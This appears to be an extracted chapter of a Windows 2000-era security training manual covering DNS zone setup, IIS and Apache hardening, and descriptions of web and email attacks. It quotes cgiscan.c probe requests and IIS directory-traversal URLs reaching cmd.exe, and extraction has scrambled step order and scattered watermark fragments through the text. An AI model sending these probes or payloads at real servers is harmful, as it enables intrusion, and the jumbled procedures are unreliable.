16. Right-click the Forward Lookup Zone scnpdns.edu, and choose Refresh. 17. Right-click the Forward Lookup Zone scnpdns.edu, and choose Update Server Data File.
In
Installing DNS
Now that a Standard Primary Server has been set up, you and the other students will install a DNS server on each of your machines. These are the servers that will later be congured as Standard Secondary Servers.
436
DO
ru ct
12. Click Add Host, click OK, then click Done.
13. Create a host record for every student machine in the classroom. Use the steps above as a guide.
15. Right-click each of the three Reverse Lookup Zones, and choose Update Server Data File.
NO
14. Right-click each of the three Reverse Lookup Zones, and choose Refresh.
PL
11. Enter the IP address for the host name, such as 172.16.10.1, and create the associated PTR record.
IC
10. For the Host Name, enter STU-W2K-L01.
or
AT
iti
on
TASK 7B-5
Installing DNS Servers
Setup: Perform this task on all student machines. 1. 2. 3. 4. 5. 6. 7. 8. 9. If necessary, log on to Windows 2000 Server as the renamed Administrator account. Open a command prompt and enter the ipcong /all command. Verify that you do not have a conguration for DNS server lookup. Keep the command prompt open. From your desktop, right-click My Network Places, and choose Properties. Double-click the Classroom Hub interface.
Click Properties, double-click TCP/IP, specify your IP address in the eld for Use The Following DNS Server Addresses, and click OK twice. Switch back to the command prompt and reenter the ipcong /all command.
Ed
T DU PL IC
10. From the Network And Dial-up Connections Control Panel menu, choose AdvancedOptional Networking Components.
12. Check DNS, and click OK.
13. Click Next, point to the location of your Windows i386 installation les, click Open, and click OK. You now have a DNS server installed on your machine.
Zone Configuration
In
DO
Now that your DNS server has been set up, you will practice installing a Standard Primary Server of your own. You will verify the conguration les associated with your DNS server. You will then remove this zone from your DNS server.
st
ru ct
11. In the Components window, highlight, but do not check, Networking Services, and click the Details button.
NO
or
Verify that you now have a conguration for DNS server lookup.
AT
iti
on
TASK 7B-6
Creating, Viewing, and Deleting Forward and Reverse Lookup Zones
1. 2. From the Start menu, choose ProgramsAdministrative ToolsDNS. Click the + sign next to your computer name to expand it. You should see two folders, one called Forward Lookup Zones and the other Reverse Lookup Zones. You can right-click either of these to add zones. First, we will add a Forward Lookup Zone. Select and right-click Forward Lookup Zones, and choose New Zone. Click Next, verify that Standard Primary is selected, and click Next.
3. 4. 5.
6. 7. 8. 9.
Click Next twice, and then click Finish.
ru ct st In
11. Enter an IP address, such as 192.168.10.101.
12. Click Add Host, click OK, and then click Done. 13. Right-click anywhere in the right pane, and choose Update Server Data File.
15. Right-click studentxxx.edu.dns, and choose Open With.
17. Observe that an A record for testhost has been created. You can also see the text format of the SOA and NS records. 18. Switch back to the DNS console. 19. Right-click the zone you just created, and choose Delete. Click OK to conrm the deletion of the zone.
DO
16. Select Notepad, uncheck Always Use This Program To Open These Files, and click OK.
NO
14. Open Explorer, and navigate to your \WINNT\System32\dns folder.
DU
PL
10. In the New Host dialog box, enter testhost for the hostname.
IC
Right-click anywhere in the right pane, and choose New Host.
or
AT
Observe the SOA (Start of Authority) and NS (nameserver) records with your servers IP address.
Expand Forward Lookup Zones, and click the zone that you just created.
Ed
For Domain Name, enter studentxxx.edu, where xxx are the last three characters of your computer name. If your computer name is stu-w2k-r03 then you should create the Forward Lookup Zone studentr03.edu.
iti
on
Standard Secondary DNS Servers

You will now congure your server to be a Standard Secondary Server. You will also verify that your Secondary Server will be able to receive the zone database information that it is entitled to.
TASK 7B-7
Creating Secondary Zones
Setup: To create a secondary zone, you rst need a primary zone to be up and running. Your instructors machine is congured with the primary zone scnpdns.edu, so we can proceed. 1. 2. 3. 4. 5. 6. 7. 8. Select and right-click Forward Lookup Zones, and choose New Zone. Click Next, select Standard Secondary, and click Next.
For Zone Name, type scnpdns.edu. In an AD environment, you can browse for zones. Click Next.
Ed
T DU PL IC
Click Add, click Next, and then click Finish. Click the zone that you just created.
9.
Right-click in the right pane.
12. Click Next, select Standard Secondary, and click Next.
14. Click Next.
15. For the IP address of the instructor machine, enter 172.17.10.1. 16. Click Add, click Next, and click Finish.
In
13. If your IP address is 172.16.10.x, enter 172.16.10 for the Network ID. If your IP address is 172.18.10.x, enter 172.18.10 for the Network ID.
DO
11. Select and right-click Reverse Lookup Zones, and choose New Zone.
st
NO
10. Observe that, because this zone is a secondary zone, no records can be added or modied. You can only do two things: refresh the list or transfer the list from the primary server.
ru ct
If you see a red X and a message that states Zone Not Loaded By DNS Server, right-click the zone, and choose Transfer From Master. Then, refresh the DNS console until the zone information is displayed. The zone database should transfer to your DNS server from the instructors machine.
or
AT
For the IP address of the instructor machine running the DNS server, enter 172.17.10.1.
iti
on
17. Expand Reverse Lookup Zones, and click the zone that you just created. 18. If the zone was not loaded by the DNS server, right-click the zone, and choose Transfer From Master. The zone database should transfer to your DNS server from the instructors machine.
20. Observe that, again, because this zone is a secondary zone, no records can be added or modied. You can only do two things: refresh the list or transfer the list from the primary server.
Zone Transfers
You will now verify that your Secondary Server will not be able to receive zone database information that it is not entitled to.
TASK 7B-8
1. 2. 3.
Attempting Blocked Zone Transfers

Click Next, select Standard Secondary, and click Next. If your IP address is 172.16.10.x, enter 172.18.10 for the Network ID. If your IP address is 172.18.10.x, enter 172.16.10 for the Network ID.
or
DO NO
ru ct
5. 6. 7. 8.
4.
Click Next.
Click Add, click Next, and click Finish.
In
440
st
Verify that you see a red X and the message Zone Not Loaded by DNS Server. Right-click the zone, and choose Transfer From Master. This time, the zone database should not transfer to your DNS server from the instructors machine. This is because the Primary Server has congured that only certain secondary servers will be allowed to transfer zone database information, and your server is not on that list. Right-click Reverse Lookup Zone, and choose New Zone.
9.
10. Click Next, select Standard Secondary, and click Next. 11. For the Network ID, enter 172.17.10. 12. Click Next.
In the left pane, click the zone that you just created.
DU
For the IP address of the instructor machine, enter 172.17.10.1.
PL
IC
AT
Select and right-click Reverse Lookup Zones, and choose New Zone.
Ed
iti
on
19. Right-click in the right pane.
13. For the IP address of the instructor machine, enter 172.17.10.1. 14. Click Add, click Next, and click Finish. 15. In the left pane, click the zone that you just created.
This is because the Primary Server has congured that no servers will be allowed to transfer zone database information. 17. Close all open windows.
Describing Web Hacking Techniques
Vulnerability Scanning
or
DO NO
One of the most popular of these is simply cgiscan.c. This program connects to a Web server (UNIX or NT) and scans to see if the given cgi vulnerabilities are present. If they are, the hacker is notied of the condition and can then proceed to exploit the hole.
ru ct
DU
PL
Although it may not be the most glamorous of techniques, searching for existing vulnerabilities is a simple way to recognize holes that will not take much effort to capitalize on. Even after Web holes and well-known vulnerabilities are exposed for years, many Web administrators do not patch or x the holes.
IC
AT
Common Web Hacking Techniques
CGI: (Common Gateway Interface) CGI is the method that Web servers use to allow interaction between servers and clients.
The following is an excerpt from the code of cgiscan.c to show several of the vulnerabilities this scan searches for:
temp[1] temp[2] temp[3] temp[4] temp[5] temp[6] temp[7] = = = = = = = "GET "GET "GET "GET "GET "GET "GET /cgi-bin/phf HTTP/1.0\n\n"; /cgi-bin/Count.cgi HTTP/1.0\n\n"; /cgi-bin/test-cgi HTTP/1.0\n\n"; /cgi-bin/php.cgi HTTP/1.0\n\n"; /cgi-bin/handler HTTP/1.0\n\n"; /cgi-bin/webgais HTTP/1.0\n\n"; /cgi-bin/websendmail HTTP/1.0\n\n";
Hackers can use this simple and efficient scanner to test sites very quickly. This effective program is one way hackers can identify holes in the security of potential targets.
In
st
Instead of taking the time to manually look for holes, hackers will use tools designed to search for specic exploit opportunities. These tools will scan a site, looking for the exact type of vulnerability that the hacker seeks.
Ed
Topic 7C
iti
on
16. Verify that you see a red X and the message Zone Not Loaded by DNS Server. Right-click the zone, and choose Transfer From Master. This time, the zone database should not transfer to your DNS server from the instructors machine.
Incorrect Web Design

Common mistakes that Web designers make are to include extra information or to include what are known as hidden tags. These tags dene values for a Web page that are not visible through the normal Web browser. Only when the source of a Web page is viewed can these tags be revealed. This extra information could be phone numbers, addresses, site designer logos, even the directory structure of the hard drive where the site resides. Hackers will simply connect normally to a Web site and view the source code of the various pages, searching for keywords and clues to further assist in attacking the site or network. This process can become tedious, however. If there is a site with hundreds of pages, searching their source code, page by page, can take days. Teleport Pro is a tool that assists in this procedure. With options such as the ability to download an entire Web site to a local hard drive for further examination, Teleport Pro has great features. Teleport Pro can also mirror entire Web sites, including their directory structures. See Figure 7-8 for an example of what Teleport Pro can do.
Ed or ru ct st
In
DO
Although not as common as in previous years, mainly due to better programming, there are sites and pages where there are hidden tags in the actual Web pages that dene the prices of items entered into open text boxes. If this were to be found as true, the hacker could simply modify the code to represent a value of, say, $5.95 instead of $59.95. During the checkout process on that site, the hacker is simply proceeding as any other user, only with a signicant discount on goods purchased!
NO
Figure 7-8: An example of the options available with Teleport Pro.
DU
PL
IC
AT
iti
on
Figure 7-9: An example of hidden tags in the source code of a Web page. Notice the price tags visible to be edited.
Ed
IC T DU PL
Buffer Overflows
or
DO NO
Buffer overows are a staple of hacking techniques that are not lost on Web hacking. Buffer overows are very effective, and there are two outstanding papers on the subject: How to Write Buffer Overows, by Mudge (1995), and Smashing the stack for fun and prot, by Aleph One (1996). These two papers outline the methods and techniques for creating buffer overows.
AT
buffer overow: This happens when more data is put into a buffer or holding area than the buffer can handle. This is due to a mismatch in processing rates between the producing and consuming processes. This can result in system crashes or the creation of a back door leading to system access.
Attackers will target programs that have been programmed in C, as native C programming does not include a bounds-checking feature. (Bounds checking veries that input elds are restrict to a given value and do not remain open-ended.) Two examples of C functions without the checking option are gets and strcpy. The attack generally has the goal of running an unauthorized process as root. If the attack executes properly, the attacker will have a root shell at his or her disposal. This is why buffer overows can be so dangerous. An attacker issues a buffer overow remotely and ends up with a root shell of a local machine. Although it may seem that buffer overows are the key to taking down systems, and you may be wondering why every system on the Internet is not already compromised, the answer is that the actual writing of buffer overows is not the easiest of processes to accomplish.
In
st
ru ct
The concept of a buffer overow is to exploit a program that does not check for the size of input being stored in a buffer (memory space). By writing input data that is beyond the normal bounds of the program, an attacker can make modications to program data stored in an adjacent memory space.
E
Hacking Via a Buffer Overow
iti
on
In order for an attacker to start from scratch and attempt a buffer overow of a target system, the following steps would have to be completed: 1. 2. 3. Locate the potential target on the Internet. (Not difficult.) Identify the running operating system. (Not difficult.) Identify the running services and programs on the target system. (Starting to get more difficult, since open ports do not indicate all running services and programs.) Reverse-engineer the services and programs on the target, looking for the potential buffer overow holes. (This is where the level of difficulty jumps much higher.)
4.
5. 6. 7.
Inject attack code on the target system. (Variable difficulty, depending on open ports, services, and programs running.)
Keeping this in mind, the process of buffer overows may not seem so overpowering as it did a few minutes ago. However, before the assumption is made that buffer overows are not a problem, you must realize that making a buffer overow from scratch is not required. When buffer overows are discovered, there are exploits written, perhaps by only one person, that become available on the Internet. This potential makes buffer overows as dangerous as ever, and arguably even more so. Hackers now can use buffer-overow attacks with no concept of how they work or what their functions are. The danger is denitely real.
Ed
T DU
Have the code execute and access the root shell. (Not difficult, assuming that the exploit is written properly.)
or
DO NO
In
444
st
ru ct
1. 2. Responses will vary.
Identifying Web Hacking Techniques

Discuss, with at least one other student, the principles of the DDoS, buffer overows, Web design aws, and vulnerability scanning. Dene potential countermoves that could be used against these techniques. Be prepared to discuss your ndings with the rest of the class.
Web Server Security

Securing a Web server is perhaps the most nerve-racking position that security professionals can nd. With changes happening daily, if not hourly, these security professionals may nd themselves overwhelmed by the amount of information they are to absorb constantly.
PL
TASK 7C-1
IC
AT
iti
Write the attack code to fall in the correct buffer space on the target. (Still remaining quite difficult.)
on
IIS Security
When Microsoft released Windows 2000, it came packaged with powerful Web server software in the form of Internet Information Server (IIS) 5.0. This software allows anyone to quickly and easily set up myriad services, including Web services. Although the number of sites hosted by IIS grows consistently, it is still far behind in terms of Web hosting on the Internet.
One of the reasons that IIS is not the leading Web-hosting platform is that there have been many serious security issues with hosting a Web site on IIS. Over the years, IIS has been found to have many vulnerabilities; often, these vulnerabilities fall under the category of buffer overows. One of the methods that attackers will use to gain access to a Web site is often called the double-dot vulnerability. This is an attack that is designed to input a character stream that will allow the attacker to gain access to directories outside of the Web data.
or
DO NO
ru ct
The specic vulnerability is a buffer overow in msw3prt.dll. In order for an attacker to take advantage of this, he or she would submit a string of approximately 420 characters that will, in turn, cause the overow. The overow in this case can be a remote command prompt. For further reading on this vulnerability, please visit the eEye Web site at www.eeye.com, and look under the Advisories link.
st
To secure a machine running IIS 5.0, it is suggested that you follow these recommendations: 1. Apply the hisecweb.inf high security template. (Templates were covered earlier in the course.) 2. 3. 4.
DU
Another attack that IIS 5.0 servers are vulnerable to is the attack via the Internet Printing Protocol (IPP). IPP provides users the ability to print documents across the Internet, submitted via a Web browser. Internet Printing is on by default in all IIS 5.0 installations, and all unpatched systems are vulnerable to this exploit.
PL
Securing IIS 5.0
In
Monitor security updates from Microsoft, using the Microsoft Hotx utility. Have this tool congured to retrieve updates every day. Follow the steps of the Microsoft Secure Internet Information Services 5.0 Checklist from TechNet. Harden the IIS machine according to the Microsoft TechNet article From Blueprint to Fortress: A Guide to Securing IIS 5.0.
IC
There is, however, a variation of this attack that the security-checking features of IIS will not catch. This is the Unicode vulnerability. This attack looks like this: http://10.10.10.1/scripts/..%c0%af../winnt/system32/cmd.exe. Although it looks similar to the previous attack, this one would be successful on a default IIS 5.0 server, because the IIS security-check software runs before the Unicode characters are decoded. Once successful, this attack will provide the attacker a command prompt for the server on the remote client.
Ed
A common attack that is trying to use this vulnerability would look like this: http://10.10.10.1/scripts/../../winnt/system32/cmd.exe. This type of attack, which may be successful on older, unpatched Web servers, will not work on a Microsoft IIS 5.0 Web server. The reason it will not work is that built-in to the IIS software is a security-checking feature that looks for the /../ pattern. If this pattern is seen, the server will not grant the request, and the attack fails.
AT
iti
on
TASK 7C-2
Investigating IIS Security
1.
Provide students with the location of the hisecweb.inf template le. If you have downloaded the selfextracting executable, have students extract the .inf le before proceeding to the next step.
Copy the le hisecweb.inf from the location specied by your instructor to your \WINNT\security\templates folder.
3. 4. 5. 6. 7.
In the left pane, right-click Security Conguration And Analysis, and choose Open Database. Enter newweb, and click Open.
From the Import Template dialog box, select hisecweb.inf, and click Open. In the left pane, right-click Security Conguration And Analysis, and choose Analyze Computer Now.
Ed
T DU
or
DO NO
8.
Close the window without saving the console.
In
446
st
ru ct
TASK 7C-3
1. 2. 3. 4.
Web Site Configuration
The following task demonstrates how to host a site on your Web server.
Implementing a Web Site

From the Start menu, choose ProgramsAdministrative ToolsInternet Services Manager. In the left pane, click and expand the options under your computer. You should see items like Default Web Site and Default SMTP Virtual Server. These are the various Internet servers running on your machine. Right-click Default Web Site, and choose Properties. You should see a dialog box with a number of tabs relating to this site. Clicking on any tab opens the Property page associated with that tab. If necessary, select the Web Site tab.
PL
IC
Click OK. You should see a list of policies, services, Registry settings, and le-system information that should be set a certain way if this is to be a secure Web server.
AT
iti
2.
Start the MMC, and add the Security Conguration And Analysis standalone snap-in.
on
Setup: A default install of Windows 2000 Server will have IIS 5.0 running. You will use the Security Conguration And Analysis Snap-in to analyze your machine against the hisecweb.inf template.
5.
In the IP Address box, observe that All Unassigned is displayed. This means that this Web site will respond to requests from any of the IP addresses associated with this computer. We need only one address to be active. For this default Web site, select the IP address connected to your classroom hub from the drop-down list. This is the one listed as 172.16.x.y if you are on the left side of the classroom or 172.18.x.y if you are on the right side. Click OK.
6.
7. 8. 9.
In the Inetpub folder, create a folder called newweb.
11. Switch back to Internet Services Manager.
12. Right-click your computer name, and choose NewWeb Site. 13. In the Web Site Creation Wizard, click Next.
Ed
T DU PL IC
10. Copy the le simple.htm from your course CD to this folder. It should be located in the \085545\Data\HTML Files folder.
15. For IP Address To Use For This Web Site, select 172.26.x.y if you are on the left side of the class or 172.28.x.y if you are on the right side. 16. Click Next.
18. Click Next twice, and then click Finish.
19. Right-click the new Web site, and choose Properties.
21. Click Add.
st
23. Click OK.
25. Click the Up Arrow button as many times as is necessary to push simple.htm document to the very top of the list. 26. Click OK. Your new Web site should be set up.
In
24. Observe the screen. To the left of the box, there are a couple of bent arrows pointing up and down.
DO
22. For the name of the default document, specify simple.htm, making sure that you match the spelling and capitalization.
NO
20. Click the Documents tab.
ru ct
17. For Path To This Web Sites Home Directory, click Browse, and then navigate and point to the newweb folder that you created earlier.
or
AT
14. For Description, enter newweb, and then click Next.
iti
In Windows Explorer, navigate to the \Inetpub folder. This is the Windows default location for the various Internet-related servers.
on
27. Right-click the new Web site, and (if necessary) choose Start. 28. Ask your partner to open a browser and connect to your Web site, using http://172.26.x.y or http://172.28.x.y depending on your location in the classroom.
Web Site Maintenance
Starting and Stopping the Web Server

1. 2. 3. 4. Switch to Internet Services Manager. Right-click your Web site, and choose Stop.
Ed
T DU
TASK 7C-4
st
DoS Problems
448
In
One of the items that you should think about from a security standpoint is that a malicious user may intend to bring down your Web server by making it so busy that the CPU slows down and eventually hangs. You can control this setting.
DO
ru ct
6. 7. 8. 9.
5.
Switch to Internet Services Manager.
Right-click your Web site, and choose Start. Verify that your partner has done the same.
Switch to Internet Services Manager, and stop your Web server. You will be doing more conguration of the Web site in the next few tasks.
NO
Switch to Internet Explorer, and refresh the page. You should again be able to view the Web page.
PL
IC
Switch to Internet Explorer, and refresh the page by choosing View Refresh or by pressing F5. You should no longer be able to view the Web page.
or
Verify that your partner has done the same.
AT
iti
When you are conducting maintenance on a Web, FTP, or email site, you should rst stop the server. When you are done with your work, you should start the server again, so that all of the changes you have made will take effect properly.
on
29. Do the same for your partner. You should be able to view the SCP Challenge Web site hosted on your partners machine.
TASK 7C-5
Controlling Performance Settings
1. 2. 3. 4. 5. 6. Right-click your Web site, and choose Properties. Click the Performance tab. Check Enable Process Throttling, and specify 25 percent. This setting depends on the number of Web sites hosted on the machine. Check Enforce Limits; otherwise, the only action that the Web server will take is to write an event to the Event Log when the limit is crossed. Check Enable Bandwidth Throttling, and specify that the maximum bandwidth available to this Web site is 256 KB/s. Leave the Newweb Properties open for the next task.
Web Server Directory Security
or
DO NO
Setup: The Newweb Properties are displayed. 1. 2. Click the Home Directory tab.
3.
Verify that Script Source Access, Write, and Directory Browsing are unchecked.
Web Server Access Controls

Access to your Web site can be controlled by specifying that only certain computers or domains should be granted access. You can also do the opposite explicitly specify denial to a computer or to a group of computers.
In
st
Observe that you can control where the content should come from. Options include a directory on this computer, a share on some other computer on this network, or even a redirection to another URL. Leave this alone for now. Below this are some check boxes relating to Web site access.
T
DU
Controlling the Home Directory Settings
ru ct
PL
TASK 7C-6
IC
AT
In a production machine, the home directory should not be located in the same partition as the operating system, as mentioned earlier. It should be in a separate NTFS partition; it could also be located on another machine on the network. Directory browsing should not be allowed, access to the script source should not be allowed, and only Read access to the Web site should be allowed. In the next task, you will take a look at some of these conguration options.
Ed
iti
on
TASK 7C-7
Controlling Access Settings
Setup: The Newweb Properties are displayed. 1. 2. Click the Directory Security tab.
Observe that there are three main areas you can work with regarding controlling access. They are Anonymous Access And Authentication Control, IP Address And Domain Name Restrictions, and Secure Communications. For now, you will work with just the middle option. Click the Edit button next to IP Address And Domain Name Restrictions. Observe that, by default, all computers will be granted access. You want to be more restrictive than the default. Click Add.
3. 4. 5. 6. 7. 8.
Observe that you can specify a single machine, a group of machines, or a domain.
or
DO NO
Specify the IP address of your partners computer. If your IP address is 172.26.10.1, specify that you will deny access to 172.26.10.2, and vice versa. Click OK twice. Click OK, and restart your Web server.
9.
ru ct In
11. Stop your Web server again.
12. On the Directory Security tab of the Web servers Properties, click the Edit button next to IP Address And Domain Name Restrictions. 13. Select the computer that you have denied access to. 14. Click Remove, then click OK. 15. Click OK, and restart your Web server. 16. Ask your partner to visit your Web site. Your partner should be successful. 17. Close all open windows.
st
DU
10. Ask your partner to visit your Web site. Access to your Web site should be forbidden. Your partner should receive the message You Are Not Authorized To View This Page.
PL
IC
AT
Leave the radio button selected for Single Computer.
Ed
iti
on
Patches and Hot Fixes

You have looked at some of the conguration options presented to you by IIS. However, if the underlying software itself is defective and has security holes, then no amount of correct conguration will help you. For this, you must be on the lookout for the latest announcements on attacks on Web servers, vulnerabilities discovered, and the ensuing xes provided by Microsoft. Microsoft is extremely proactive with regard to this and works with many experts in the industry to provide a x for a problem before it can get out of hand. Routinely checking for and applying updates to your Microsoft servers is recommended. Using the Windows Update command found in the Start menu takes you directly to Microsofts Windows Update site, where your machine will be scanned for what service packs and/or security hot xes are already installed on your machine. This can also be automated on your machine so that your machine periodically checks for updates without intervention by you. In enterprise scenarios, you might not want your production machines to go out and update themselves automatically. Instead, you should perform such updates on a test machine rst. When you want to apply a specic patch on your production machines, Microsoft will release this as a separate hot x that you download. One such update posted on October 30, 2002, Q327696, addresses four newly discovered security vulnerabilities affecting Web servers running on Windows computers: Out-of-process Privilege Escalation WebDAV Denial of Service Script Source Access Vulnerability Cross-site Scripting in IIS Administrative Pages
Ed
T DU PL IC
The rst of the four in this list could enable applications on a server to gain system-level privileges. It was posted on Microsofts Web site with a severity rating of Moderate.
If you were to visit Microsofts site, you would also see that these four vulnerabilities had the numbers shown in the following table. Number
CAN-2002-0869 CAN-2002-1182 CAN-2002-1180 CAN-2002-1181
st
Another good tool to use with IIS is the IIS Lockdown tool, also downloadable from Microsofts site at www.microsoft.com/downloads/release.asp?ReleaseID= 43955. Follow this hyperlink and download the le iislockd.exe.
In
These numbers are hyperlinked to the Web site www.cve.mitre.org, where Common Vulnerabilities and Exposures are classied, and the information is shared. A vulnerability that is thoroughly researched and classied is prexed with the letters CVE and followed by the year and incident number. Until then, a temporary number is allocated, a candidate number, so the prex is CAN.
DO
ru ct
Vulnerability
NO
Out-of-process Privilege Escalation WebDAV Denial of Service Script Source Access Vulnerability Cross-site Scripting in IIS Administrative Pages
or
AT
iti
on
TASK 7C-8
Using the IIS Lockdown Tool
1.
Provide students with the location of the IIS Lockdown tool le.
2. 3. 4. 5.
Double-click iislockd.exe, and click Next. Click I Agree, and then click Next.
Check HTTP and FTP, and verify that SMTP and NNTP are unchecked. If a server has not been installed before, it will be grayed out and will not offer you any choice. If you were implementing this tool in a production environment and were sure that you would not use SMTP, then you would check Remove Unselected Services.
6.
Leave the Remove Unselected Services check box unchecked for now, and click Next.
Ed
T DU
7. 8.
Verify that only the box for ASP is unchecked, and click Next. On the Additional Security page, again all of the options that you select will be removed. Leave the Additional Security options checked as they are, and click Next.
st
Hot-fix Checker
In
One good tool to use on a Windows box is the hot-x checker HfNetChk. By downloading the tool from www.microsoft.com and running it, you will very quickly be able to record what hot xes and service packs are running on your machine, as well as which Knowledge Base articles you have to read to nd out more about a particular x.
452
DO
ru ct
9.
10. Click Next to install the URLScan lter. 11. Verify the summary presented to you, and click Next. 12. Wait until the security settings are applied, then click Next, and click Finish. It takes only a minute or two to apply the security settings.
NO
PL
IC
Observe that, on the Script Maps page, the boxes you check are the ones that will be disabled.
or
AT
The next page deals with script maps and is important.
iti
Specify that you want to use the Dynamic Web Server (ASP Enabled) template, check View Template Settings, and click Next.
on
Copy the le iislockd.exe from the location provided by your instructor to your desktop.
An excellent article on Microsofts Web site regarding how to harden a Windows 2000 Server with IIS running on it is Knowledge Base Article Q311135. A summary of the sequence of tasks is presented here. Please visit Microsofts Web site to read the full article. 1. Install Service Pack 3. 3. 4. 5. 6. Install and run all IIS updates. Install and run Hfnetchk to compile a list of needed hot xes. Install Qchain.exe. Use Qchain.exe to install multiple hot xes with only one restart.
TASK 7C-9
Using the Hot Fix Net Check Tool
1. 2. 3.
Copy the nsch332.exe le from the location provided by your instructor to your desktop. Double-click nshc332.exe, and click Yes twice to install and to accept the License Agreement. Point to a location where you want to install the extracted les, and click OK. For instance, you could create a folder on your boot partition named hfnetchk, and install the les there.
Ed
T DU PL IC
4. 5. 6.
Read the instructions presented to you, and click OK.
Enter hfnetchk to check your OS installation. If you are not connected to the Internet, you may see a couple of error messages while the executable attempts to contact microsoft.com, but you can ignore these for now. View the results.
7. 8. 9.
Enter hfnetchk /? to see the Help associated with this executable.
st
10. Examine the various switches available for use with the tool. 11. Enter hfnetchk -v to obtain more detailed output. 12. View the results.
In
DO
Read the description for what HFNETCHK does. If you can lay your hands on the Microsoft Knowledge Base Articles Q303215 and Q315665, they will provide additional information. Both of these articles are available from Microsofts Web site.
ru ct
Open a command prompt, and navigate to the folder where you installed nsch332.exe.
NO
or
AT
iti
Provide students with the location of the Hot Fix Net Check tool le.
on
2.
Run Windows Update.
Apache
For all the press that Microsofts IIS has gotten regarding the security vulnerabilities, such as those detailed above, you might think that it is the most prolic Web server, but this is not the case. The Web server that runs the majority of the Web sites on the Internet is called Apache. In a recent survey, Apache servers were running 63 percent of the Web sites on the Internet. For comparison, IIS is running approximately 23 percent of the sites. Updated statistics can be found at www.netcraft.com. Apache is an Open Source application that runs on Linux and UNIX computers. You can obtain the most recent version and release information at www.apache.org In addition to the Web site, most Linux distributions include the application as well. Check the Web site associated with your release for current Apache updates. Once Apache is running on your server, conguration can begin. The default installation of the Apache Web server is run under the apache user. This account is neither required tonor has access towrite to the server conguration directories, such as etc/httpd/conf. The conguration les are owned by root, and the apache user is given only Read permissions to these les. It is suggested that you create a new user account to manage these les, as root would have no reason to update them. It is also suggested that you do not have the apache user account become the managing user for these les.
Ed
T DU
or
DO NO
454
In
st
ru ct

Another critical le for conguration is the httpd.conf le. Previously, the cong options were stored in three separate lesaccess.conf, srm.conf, and httpd.conf. Now, the only le that requires editing of this data is the httpd.conf le. Although there are many different options for managing this le, we will look at some of the parameters. The ServerType option is used to dene whether or not the Apache server will run on its own, or as part of the inetd. It is recommended that the server run on its own, as a standalone server. The KeepAlive option is used to dene the settings for connection times. This setting is where you can dene idle time and how long the server will wait for subsequent client requests. The ServerRoot option is used to dene the root of the server. It is very strongly recommended that the server root not be the actual root directory itself. Commonly, etc/httpd/ will be the root.
These are just a few of the many conguration options that you will have when you are conguring a secure Apache Web server. Once you have locked down your server, you may see why this is the most popular Web server on the Internet.
PL
IC
One of the les that can be created and used by the Apache server is the .htpasswd le. This le is used to contain users and passwords for authentication purposes to the server. The .htpasswd le is encrypted on the hard disk, and by default, it is owned by root and the root group.
AT
iti
on
Topic 7D
Describing Methods Used to Attack Users
Email Hack Attacks
Of all the potential areas where users of the Internet are at risk, perhaps their email systems are the most vulnerable. Even more accurate would be to state that the potential risk is what can be done with the email system. Email hacking generally is done using one of two methods. The rst is to actually have the email message itself be the hack by using HTML. The second, and more common, is to attach malicious les to email messages and send them to unknowing victims.
Ed
T DU PL IC
HTML Email Attacks
The ability to create an HTML email message in Outlook Express (and Outlook) is built in to the program. To turn on HTML composing: 1. Open Outlook Express. 3. 4. 5. In the Options dialog box, select the Send tab. Click OK.
On the Send tab, under Mail Sending Format, select HTML.
st
In
Further options for HTML formatting of Outlook Express email are the choices of different MIME (Multipurpose Internet Mail Extensions) encoding options, and sending pictures with a message. See Figure 7-10 for an example of these settings.
DO
NO
2.
ru ct
HTML email attacks are popular, but a bit harder than they seem to be at rst glance. The premise of HTML email hacking is to embed the hackers code into the actual body of the message, so that it is executed by the receiving users computer, but is not visible to that user.
or
AT
iti
Such an evolution, so fast, has come with downsides. The vast majority of users on the Internet are not even aware of security issues, let alone taking steps to protect themselves. Many ISPs do not provide adequate security-related information to their users, and more and more people connect each day.
on
In the past (meaning the late 1980s to early 1990s), most users of the Internet were technical in nature, and connections to the Internet were not that common. Once the World Wide Web began evolving and large-scale national ISPs began showing up, casual users started to log on. By the year 2000, there were many people who considered their Internet connections more vital to their lives than having the lights on.
Hack Attacks Targeting Users
Ed or
DO NO
ru ct In
That being said, lets take a look at an example of an email message encoded in HTML, shown in Figure 7-11.
st
Figure 7-11: An example of an HTML email as a text document.
DU
PL
IC
Although users and hackers have the option to turn on HTML encoded email, simply having the option to do so does not equate into educated hackers using HTML properly. It is much easier for most hackers to persuade victims to open attachments, as we will see in a moment.
AT
Figure 7-10: The encoding options for HTML email in Outlook Express.
iti
on
This email is harmless, but it is evident that the amount of what can be encoded in HTML is only limited by the imagination of the composer.
Scripting Vulnerabilities
st
In
DO
The code example shown in Figure 7-12 was written by Georgi Guninski, who has found many security vulnerabilities and has provided full documentation on them. This code would execute upon viewing the associated Web page. The end result of this code is a simple alert window, but the only limitation is the imagination.
NO
Although the Authenticode system is effective, Microsoft has included an ActiveX issue with their Safe For Scripting option. There are two noted controls that ship with IE that have this Safe For Scripting option set. Setting this ag means that the system will go ahead and execute these controls without using the Authenticode system. To compound the issue, the two controlsnamed Scriptlet.typelib and EyeDog.Ocxhave the ability to access the users les. Additionally, Scriptlet.typelib has the ability to edit, create, and even overwrite les on the users local hard drive.
DU
ru ct
PL
To stop a hacker from executing any control they wish, Microsoft included an authentication system called Authenticode. Authenticode requires software developers to have their work signed, and a notice of this shows on the users screen in the form of a pop-up window. If the control has not been signed under the Authenticode system, a warning pops up, informing the user of this.
or
IC
AT
ActiveX applications (controls) are written to provide a specic purpose, such as showing a movie clip, and are embedded into Web pages to provide this ability. The ActiveX controls, which have an .OCX le extension, are embedded into Web pages by using the <OBJECT> tag. Upon entering a Web site that has an embedded control, Internet Explorer checks the local users Registry to locate the required component. If the control is not already on the users system, Internet Explorer downloads and installs the control into the area dened by the Web pages <OBJECT> tag.
Ed
Outlook and Outlook Express have made the lives of hackers much easier by allowing the ability to attack a user simply by having him or her read an email or view it in the Preview pane. This is due to the ActiveX options included in these Microsoft programs. We will move off the subject of email hacking for a moment to dene ActiveX. ActiveX is an implementation of mobile code by Microsoft. The Microsoft denition of ActiveX is A set of technologies that allows software components to interact with one another in a networked environment, regardless of the language the components were created.
iti
on
Although the possibilities of HTML encoded email are unlimited, there are specic areas of the target users computers that the hacker will want to take advantage of. One of these is the ability to execute scripts by the users email client.
Figure 7-12: Georgi Guninskis example of Safe For Scripting vulnerabilities.
Just as IE has Safe For Scripting, so do Outlook and Outlook Express. By composing an HTML email message that calls the correct control, as in the Web example above, users can end up executing unknown code. Email scripting problems for Outlook and Outlook Express can be greatly diminished by disabling the Preview option. In most situations, simply previewing the message with the code is all that is required for execution.
Ed
T DU
